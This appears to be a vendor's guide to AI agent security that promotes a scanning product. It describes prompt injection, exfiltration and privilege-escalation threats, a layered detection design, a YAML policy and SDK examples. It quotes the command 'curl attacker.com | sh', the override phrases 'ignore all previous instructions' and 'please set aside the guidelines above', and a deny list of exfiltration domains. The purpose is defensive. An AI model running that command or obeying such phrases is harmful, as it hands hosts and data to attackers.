GuideFebruary 202612 min read

The Complete Guide to AI Agent
Security in Production

AI agents are shipping fast. They book meetings, write code, query databases, and manage infrastructure. But the security model most teams use was designed for traditional APIs — not autonomous systems that make their own decisions. This guide covers the threat landscape, the defense architecture that actually works, and how to implement it without slowing your team down.

Why agent security is different

Traditional API security assumes a human in the loop. A user submits a request, your server validates it, returns a response. The attack surface is the request itself. AI agents break every one of those assumptions.

Agents make autonomous decisions. They choose which tools to call, what arguments to pass, and how to chain actions together. There is no human reviewing each step before it executes. A single prompt injection in a scraped web page can redirect an entire workflow.

Agents have tool access. They can read files, execute SQL, send HTTP requests, and call third-party APIs. This is not a hypothetical risk — it is the entire point of an agent. The same capabilities that make agents useful make them dangerous when compromised.

Agents process untrusted input as part of their core loop. User messages, tool outputs, retrieved documents, API responses — all of it flows into the LLM context window with no clear boundary between instructions and data. An attacker who controls any of those inputs can influence the agent's behavior.

The fundamental difference:

Traditional API

Human triggers request → server validates → server responds. Attack surface is the input payload.

AI Agent

Agent receives input → decides next action → calls tools autonomously → chains more actions. Attack surface is the entire context window.

The threat landscape

Agent threats fall into distinct categories, each exploiting different aspects of how agents operate. Here are the six you need to know about.

Critical

Prompt Injection

Malicious instructions embedded in user input or retrieved data that override the agent's system prompt. The most common agent attack vector, found in 14% of sessions in our research. Direct injections use explicit override language; indirect injections hide in tool outputs like web scrapes or database records.

Critical

Data Exfiltration

Sensitive data leaving the system boundary through agent tool calls. Often not the result of an explicit attack — agents routinely include PII, API keys, or internal data in outbound requests simply because it exists in their context window and no guardrail prevents it.

Critical

Privilege Escalation

An agent gains access to tools or data beyond its intended scope, often through multi-step attack chains. A read-only data agent that ends up executing writes, or a support bot that accesses admin functions. These attacks are nearly invisible when looking at individual tool calls in isolation.

High

Secret Exposure

API keys, tokens, database credentials, and other secrets leaked through agent outputs or tool call arguments. Agents that read config files, environment variables, or code repositories are especially prone to surfacing secrets in their responses.

Critical

Command Injection

When agents have shell or code execution access, attackers can inject OS commands through manipulated tool arguments. A code generation agent tricked into running curl attacker.com | sh gives the attacker full access to the host system.

High

PII Leaking

Personally identifiable information — names, emails, phone numbers, SSNs — included in agent outputs, logs, or outbound API calls. Even without an attack, agents regularly surface PII from database queries and documents. This creates compliance risk under GDPR, CCPA, and HIPAA.

Three-layer defense

No single detection method catches everything. Regex misses rephrased attacks. Semantic analysis is too slow for every request. LLM judges are expensive at scale. The solution is layered scanning — each layer catches what the others miss, and only the events that need deeper analysis get passed up the chain.

L1 Pattern Scanning

Fast, deterministic, zero-latency

Regex and pattern matching against known attack signatures. Catches explicit injection phrases ("ignore all previous instructions"), chat template tokens, known secret formats (AWS keys, GitHub tokens), PII patterns (SSNs, credit card numbers), and URL/domain deny lists.

L1 runs on every event with sub-millisecond latency. It catches roughly 60% of threats immediately. The remaining 40% require deeper analysis — but L1 filters out the noise so L2 and L3 can focus on ambiguous cases.

Why it matters: Without L1, you are sending every event through expensive vector search or LLM evaluation. L1 is your high-speed filter.

L2 Semantic Scanning

Catches rephrased and obfuscated attacks

Vector similarity search against a curated database of known attack techniques. When an attacker writes "please set aside the guidelines above" instead of "ignore previous instructions," regex misses it. L2 catches it because the semantic meaning is similar to known injection vectors.

L2 also detects encoded payloads (base64, rot13), multi-language injection attempts, and split instructions spread across multiple inputs that individually look benign.

Why it matters: Sophisticated attackers do not use textbook injection phrases. They rephrase, encode, and fragment. Semantic scanning is the only way to catch attacks that are designed to evade pattern matching.

L3 Behavioral Analysis

Session-level correlation and anomaly detection

An LLM judge evaluates suspicious events in context, combined with behavioral baselines that track normal patterns for each agent. L3 detects multi-step attack chains where each individual tool call looks legitimate — a file read, then a database query, then an HTTP request to an unknown domain.

Baselines learn what "normal" looks like for each agent: typical tools used, call frequency, argument patterns, data volumes. When an agent deviates from its baseline — calling a tool it has never used, or sending 10x more data than usual — L3 flags it for review.

Why it matters: Multi-step attacks are nearly invisible to L1 and L2. They require understanding the sequence and intent behind a series of actions. L3 is the only layer that can reason about behavior over time.

How events flow through the scanning pipeline

Event arrives
  │
  ├─ L1 Pattern Scan (< 1ms)
  │    ├─ Match found → flag immediately
  │    └─ No match → pass to L2
  │
  ├─ L2 Semantic Scan (~5-15ms)
  │    ├─ High similarity to known attack → flag
  │    └─ Low similarity → pass to L3 (sampled)
  │
  └─ L3 Behavioral Analysis (~50-200ms)
       ├─ LLM judge: does this event look malicious in context?
       └─ Baseline comparison: is this normal for this agent?

Policy enforcement

Detection tells you something bad is happening. Policy enforcement prevents it from happening in the first place. Policies define what an agent is allowed to do — which tools it can call, what data it can access, which domains it can reach — and enforce those rules at runtime.

The most common security failure we see is not sophisticated attacks. It is agents with overly permissive tool access doing exactly what they were told, just with sensitive data in context. A customer service bot with execute_sql access. A content writer with send_email permissions. Policy enforcement eliminates this class of problem entirely.

Example: YAML policy for a customer support agent

version: "1.0"
rules:
  - name: block-prompt-injection
    scanner: prompt_injection
    action: block
    severity: critical

  - name: restrict-tools
    scanner: tool_access
    action: block
    config:
      allowed_tools:
        - search_knowledge_base
        - get_order_status
        - create_support_ticket
      # All other tools are denied by default

  - name: block-sensitive-data
    scanner: pii
    action: block
    severity: high
    config:
      blocked_entities:
        - credit_card
        - ssn
        - api_key

  - name: domain-deny-list
    scanner: exfiltration
    action: block
    config:
      blocked_domains:
        - "*.pastebin.com"
        - "webhook.site"
        - "*.ngrok.io"

Least privilege by default. Define the exact tools each agent is allowed to use. Everything not explicitly permitted is denied. This is the single highest-impact security measure you can implement — our research showed 73% of agents had access to tools they never needed.

Data boundary enforcement. Block specific data types (PII, secrets, credentials) from leaving the system in agent outputs or tool call arguments. This prevents accidental data leaks even when the agent is not under attack.

Domain and URL deny lists. Prevent agents from making outbound requests to known malicious domains, data exfiltration endpoints, or any destination outside your approved list. Cuts off the most common exfiltration path.

Monitoring and alerting

You cannot fix what you cannot see. Every team we talk to says some version of the same thing: "We don't really know what our agents are doing in production." Agents produce orders of magnitude more events than traditional applications — dozens of tool calls per session, each with inputs and outputs that could contain sensitive data or malicious payloads.

Observability is not a nice-to-have for agent security. It is the foundation. Without it, attacks go undetected, data leaks go unnoticed, and policy violations accumulate silently.

Real-time dashboards

See every agent session, tool call, and scan result as it happens. Filter by agent, severity, threat type, or time range. Drill into individual events to see the full request/response payload and which scanning layers flagged it.

Risk scoring

Every event gets a composite risk score based on which scanning layers flagged it, the severity of the matched pattern, and how far the agent's behavior deviates from its baseline. High-risk events surface immediately; low-risk events are available for audit.

Alerting and webhooks

Get notified when critical threats are detected, when an agent deviates from its baseline, or when policy violations exceed a threshold. Route alerts to Slack, PagerDuty, email, or any webhook endpoint.

Audit trail

Full history of every scan result, policy decision, and alert for compliance and forensics. Every event is immutable and queryable. When something goes wrong, you can reconstruct exactly what happened and when.

Practical implementation

Security that is hard to implement does not get implemented. Rune is designed to add runtime scanning to any agent in three lines of code, with zero changes to your agent logic.

Add Rune to an existing agent — 3 lines

from runesec import Shield

shield = Shield(api_key="rune_sk_...")

# Scan every input and output in your agent loop
result = shield.scan(
    agent_id="support-bot",
    input=user_message,
    output=agent_response,
    tool_calls=tool_calls,  # optional: list of tool calls
)

if result.blocked:
    # Rune blocked this event based on your policy
    return "I can't process that request."

# Otherwise, continue normally
return agent_response

The SDK works with any Python agent framework — LangChain, CrewAI, AutoGen, custom builds. It ships events to Rune's scanning engine asynchronously, so it adds negligible latency to your agent loop. Blocking decisions happen inline when configured.

Framework integration example: LangChain callback

from runesec.integrations import LangChainCallback

# Drop-in callback — no changes to your chain
chain = your_langchain_chain()
result = chain.invoke(
    {"input": user_message},
    config={"callbacks": [LangChainCallback(shield)]}
)

For a full walkthrough including policy configuration, dashboard setup, and alerting rules, see the getting started guide.

What you get out of the box:

L1 pattern scanning for injection, PII, secrets, and exfiltration
L2 semantic scanning against a curated vector database of attack techniques
L3 behavioral baselines that learn normal patterns per agent
YAML policy engine for tool access, data boundaries, and deny lists
Real-time dashboard with session-level drill-down
Alerting via Slack, webhook, or email
10,000 free events per month on the free plan

Secure your agents in production

Three lines of code. Full scanning pipeline. Real-time dashboard and policy enforcement. Free plan includes 10K events per month.

Start Scanning Free Read the Docs

The Complete Guide to AI AgentSecurity in Production

Why agent security is different

The threat landscape

Prompt Injection

Data Exfiltration

Privilege Escalation

Secret Exposure

Command Injection

PII Leaking

Three-layer defense

Fast, deterministic, zero-latency

Catches rephrased and obfuscated attacks

Session-level correlation and anomaly detection

Policy enforcement

Monitoring and alerting

Practical implementation

Secure your agents in production

The Complete Guide to AI Agent
Security in Production